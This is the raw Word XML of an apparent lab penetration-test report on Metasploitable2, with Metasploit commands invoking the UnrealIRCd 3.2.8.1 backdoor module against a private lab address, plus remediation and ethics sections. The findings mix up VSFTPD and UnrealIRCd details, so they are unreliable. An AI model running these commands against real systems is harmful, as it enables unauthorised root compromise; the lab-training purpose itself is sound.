    <w:p w14:paraId="3DDD0DF3" w14:textId="7612A514" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="00C826A4" w:rsidP="003043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Pr="00C826A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69B0823" wp14:editId="47B0BB9C">
            <wp:extent cx="5733415" cy="2425700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="270184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1840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CED61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1FE59264" w14:textId="6D12B216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3. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DD29B" w14:textId="3E726994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use </w:t>
      </w:r>
      <w:r w:rsidR="00FA409A" w:rsidRPr="00FA409A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA409A" w:rsidRPr="00FA409A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA409A" w:rsidRPr="00FA409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FA409A" w:rsidRPr="00FA409A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA409A" w:rsidRPr="00FA409A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F55AB4" w14:textId="429FEA4B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set RHOSTS 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00FA409A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA409A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F7819" w14:textId="621A1C3F" w:rsidR="00FA409A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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC4C69" w14:textId="434C3FB1" w:rsidR="00FA409A" w:rsidRDefault="00FA409A" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA409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F34404A" wp14:editId="0A687FCC">
            <wp:extent cx="5733415" cy="2425700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="148180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8025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F7A7" w14:textId="77777777" w:rsidR="00FA409A" w:rsidRDefault="00FA409A" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3708A4BD" w14:textId="77777777" w:rsidR="00FA409A" w:rsidRDefault="00FA409A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A409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4AEE753" wp14:editId="1E1C3580">
            <wp:extent cx="5733415" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="33342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4245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8DA95" w14:textId="77777777" w:rsidR="00C826A4" w:rsidRDefault="00C826A4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DF23216" w14:textId="0677119C" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="00FA409A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A409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FDDA85F" wp14:editId="1944FBA8">
            <wp:extent cx="5733415" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="62600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0087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374D2CC6" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D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D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AE7A8" w14:textId="77777777" w:rsidR="00207D89" w:rsidRPr="00207D89" w:rsidRDefault="00207D89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6BB6A65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This engagement identified critical vulnerabilities in the target infrastructure, leading to complete system compromise. The primary issue was an outdated VSFTPD service containing a known backdoor, allowing unauthenticated remote code execution as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED5C96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20865334" w14:textId="77777777" w:rsidR="00C826A4" w:rsidRDefault="00C826A4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05D3A9" w14:textId="52765421" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4195ED43" w14:textId="64AC7B23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- </w:t>
      </w:r>
      <w:r w:rsidR="00C826A4" w:rsidRPr="00C826A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2010-2075</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439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C826A4" w:rsidRPr="00C826A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irc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v2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBE85A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- Impact: Root-level compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD8356" w14:textId="31514BF2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- Attack Vector: Unauthenticated network access to port </w:t>
      </w:r>
      <w:r w:rsidR="00C826A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6667</w:t>
      </w:r>
      <w:r w:rsidRPr="003043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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25344E63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62B00521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Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1A2A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1. Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A789A" w14:textId="1A75DF9D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Upgrade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C826A4" w:rsidRPr="00C826A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to latest version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4176C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Implement firewall rules to restrict FTP access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39775B8F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Conduct credential rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300428F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2C0637F9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2. Long-term Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E2500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Establish patch management process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE26C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Implement network segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172349FC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Deploy intrusion detection systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA1546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</w:p>
    <w:p w14:paraId="2C6EF845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3. Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383740B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Rescan with OpenVAS to confirm remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB6C0D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 xml:space="preserve">   - Perform penetration test validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E6E82" w14:textId="77777777" w:rsidR="008026BB" w:rsidRDefault="008026BB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A6F6F7" w14:textId="77777777" w:rsidR="003E7869" w:rsidRDefault="003E7869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3A56FC" w14:textId="63D4E57F" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="003043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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Legal &amp; Ethical Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27D610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- All testing performed in isolated lab environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C1FD2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- Proper authorization obtained for all targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D8670" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D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- Educational purposes only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53460930" w14:textId="27CB7E03" w:rsidR="0075324E" w:rsidRDefault="0030439D" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Follow responsible disclosure principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02935E6A" w14:textId="767CFAEE" w:rsidR="000F4A7D" w:rsidRDefault="000F4A7D" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519BEA8A" w14:textId="211A9345" w:rsidR="000F4A7D" w:rsidRDefault="00D1121B" w:rsidP="003043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F4A7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidR="000F4A7D" w:rsidRPr="000F4A7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926DEBC" w14:textId="77777777" w:rsidR="00D1121B" w:rsidRPr="000F4A7D" w:rsidRDefault="00D1121B" w:rsidP="0030439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2F55A3" w14:textId="77777777" w:rsidR="00D1121B" w:rsidRPr="00D1121B" w:rsidRDefault="00D1121B" w:rsidP="00D1121B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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D1121B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Kali Linux: https://www.kali.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF50B48" w14:textId="77777777" w:rsidR="00D1121B" w:rsidRPr="00D1121B" w:rsidRDefault="00D1121B" w:rsidP="00D1121B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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D1121B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>OpenVAS: https://www.openvas.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53A616" w14:textId="3AFBEC9F" w:rsidR="00D1121B" w:rsidRPr="00D1121B" w:rsidRDefault="00D1121B" w:rsidP="00D1121B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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D1121B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Metasploitable2: https://docs.rapid7.com/metasploit/metasploitable-2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017764E" w14:textId="77777777" w:rsidR="00D1121B" w:rsidRPr="00D1121B" w:rsidRDefault="00D1121B" w:rsidP="00D1121B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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D1121B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CVE Databases: https://cve.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078806CE" w14:textId="77777777" w:rsidR="000F4A7D" w:rsidRPr="0030439D" w:rsidRDefault="000F4A7D" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000F4A7D" w:rsidRPr="0030439D" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="default" r:id="rId25"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432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E5D6C" w14:textId="77777777" w:rsidR="001A78DC" w:rsidRDefault="001A78DC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22420521" w14:textId="77777777" w:rsidR="001A78DC" w:rsidRDefault="001A78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6DC92" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="67EEA394">
        <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="4658A5C1" w14:textId="14EF469B" w:rsidR="00C776D2" w:rsidRDefault="003B4604" w:rsidP="003B4604">
    <w:pPr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D38F2" w14:textId="77777777" w:rsidR="001A78DC" w:rsidRDefault="001A78DC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="441C8DA4" w14:textId="77777777" w:rsidR="001A78DC" w:rsidRDefault="001A78D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51FCB" w14:textId="68D5EA92" w:rsidR="00C776D2" w:rsidRDefault="00000000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5E4292F4" wp14:editId="3B0C74EE">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1444461</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342899</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618141" cy="1023938"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom distT="114300" distB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6796"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="8618141" cy="1023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F35AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18BEB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C040F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BB4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F6326"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F162E2C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376DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA24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C21D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E8C7A6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D4071F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D10E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A97ADD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3B03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3B5202"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AA64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135E56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3B25638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09314F1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A76C6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A53598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B06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DF678B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D02F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4F75E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06E27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D91896"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DED6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1622A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ABC0C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8D63F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B05E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9760EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB64C89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261D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEBA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B91C20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43FEB28C"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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21977EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6B040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452598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F300E1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1563334E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06B2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8B201C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14DE0FEE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64C180F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="757A3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8180D59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D688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8DB309F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB68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3B2965"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D49C254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93635E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A408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F62AF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CD0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450491"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CDC21FE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1AE16C92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB6A8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B220AD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4A2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261D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="978693C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7F428E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C6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E8734D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="690A2D8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1464D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3EC19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2C4F0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42980D00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16E28B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65140F0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24F783F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6D6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3191FBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD96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844335"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11FA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0A5E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F56584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DC44C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BE2D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74B12FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBF0AD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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="292F308B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C208265C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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29DB607F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCB26F3C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2A984BD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EE0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C062D84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB64C89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A82144"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24DEBD0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0D103E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C04C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C06D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76286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2BC1B4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="750A5DE0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339768D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C45A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7B975C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC7A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92458B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78A4C9A6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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="397C166D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197C2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B375ACB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F056A3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C33331C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA02A0A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EFC7937"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3E0861C"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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4083102C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="102CB3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0B93407"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="415602C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18D6F43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7136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3E31199"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B16C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45C3491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3502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A27072F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9564A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C333CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="326221BC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E003E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4718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D7A0BE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3EC19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4A2791"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4F2027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1DB1609"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1056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2EF6390"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D70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43F35EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A94EC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5A85771"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11564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6525E58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="553E905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DE20D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="243C59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9E4457C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA0ECA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EE53A38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C08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5DD1754"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50B4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639671F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B316E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97B6E2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3EC19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B1D0BA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C10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CDF6397"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6824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F7B189F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA22C34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966FEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF20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1B3398A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="529A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2DA599E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73F05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475750A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CBA54A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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="764622F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BC2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850662A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38D81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92722EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E40E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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79614592"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86F00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9EC215B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF0028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A6A064B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2668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ABE1F1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA0A028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023D5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEE06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B762A05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77A0B4D8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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7DCA06FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F300E1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01342301">
    <w:abstractNumId w:val="85"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1896964843">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1910381895">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1729955620">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="953825194">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1085419029">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1979531761">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="465778830">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1589927102">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="256065570">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1786539672">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="848180348">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1243102479">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="590432118">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1137456812">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="920525112">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="238563811">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1158224892">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="963195899">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="521751643">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1300843007">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="476191204">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1936478540">
